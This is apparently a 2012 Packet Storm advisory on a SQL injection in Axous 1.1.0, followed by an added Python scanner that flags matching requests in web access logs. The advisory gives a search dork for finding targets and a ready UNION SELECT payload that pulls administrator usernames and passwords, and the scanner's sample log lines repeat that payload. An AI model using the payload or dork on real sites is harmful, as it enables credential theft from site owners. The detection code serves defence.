Axous 1.1.0 SQL Injection

2012-04-27T00:00:00
ID PACKETSTORM:112258
Type packetstorm
Reporter Farbod Mahini
Modified 2012-04-27T00:00:00

Description

                                        
`########################################################################################  
# #  
# Exploit Title : Axous 1.1.0 SQL Injection Vulnerability #  
# #  
# Author : Secure-Land Security Team #  
# #  
# Discovered By : farbodmahini #  
# #  
# Home : Secure-Land.net #  
# #  
# Version : All Versions #  
# #  
# Vendor Link : www.axous.com #  
# #  
# Contact : farbodmahini@yahoo.fr , farbodmahini@gmail.com #  
# #  
# Security Risk : High #  
# #  
# Dork : intext:"Powered by Axous 1.1.0" #  
# #  
# #  
########################################################################################  
# Exploit:  
#  
#  
# http://[target]/page.php?id=[SQL]  
#  
# [~] SQL :  
#  
# page.php?id=-1+union+select+1,group_concat(id,0x3a,username,0x3a,password),3+from+fdb_administrators--  
#  
#   
# [~] Demo:  
#  
#  
########################################################################################  
# #  
# Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us #  
# #  
########################################################################################  
# #  
# Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id #  
# #  
########################################################################################  
`
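
A defender-side check for the request pattern shown above, as an added example that is not part of the original advisory: it scans web access logs for `page.php` requests whose `id` parameter is not a plain integer. The combined log format, the sample lines, the function names and the rule that legitimate page ids are plain integers are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"union\s+select", re.IGNORECASE)
ADMIN_TABLE = "fdb_administrators"  # table named in the advisory's query

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Apr/2012:10:00:01 +0000] "GET /page.php?id=7 HTTP/1.1" 200 5120',
    '192.0.2.66 - - [27/Apr/2012:10:00:09 +0000] "GET /page.php?id=-1+union+select+1,'
    'group_concat%28id,0x3a,username,0x3a,password%29,3+from+fdb_administrators-- HTTP/1.1" 200 734',
    '192.0.2.66 - - [27/Apr/2012:10:00:12 +0000] "GET /axous/page.php?id=3%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 610',
    '192.0.2.31 - - [27/Apr/2012:10:00:20 +0000] "GET /page.php?id=5%27 HTTP/1.1" 500 0',
    '192.0.2.10 - - [27/Apr/2012:10:00:25 +0000] "GET /index.php?id=abc HTTP/1.1" 200 880',
]

def classify(log_line):
    """Return None for an unremarkable line, else a reason string."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    try:
        url = urlsplit(match.group(1))
    except ValueError:
        return "unparseable-target"
    if not url.path.lower().endswith("/page.php"):
        return None
    # parse_qs turns '+' into spaces and decodes %xx escapes before we inspect the value.
    for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumption: legitimate page ids are plain integers
        if ADMIN_TABLE in value.lower():
            return "admin-table-read"
        if UNION_RE.search(value):
            return "union-select"
        return "non-numeric-id"
    return None

def scan(lines):
    """Return (line_number, reason) for every flagged line."""
    return [(n, r) for n, line in enumerate(lines, 1) if (r := classify(line))]

if __name__ == "__main__":
    for number, reason in scan(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```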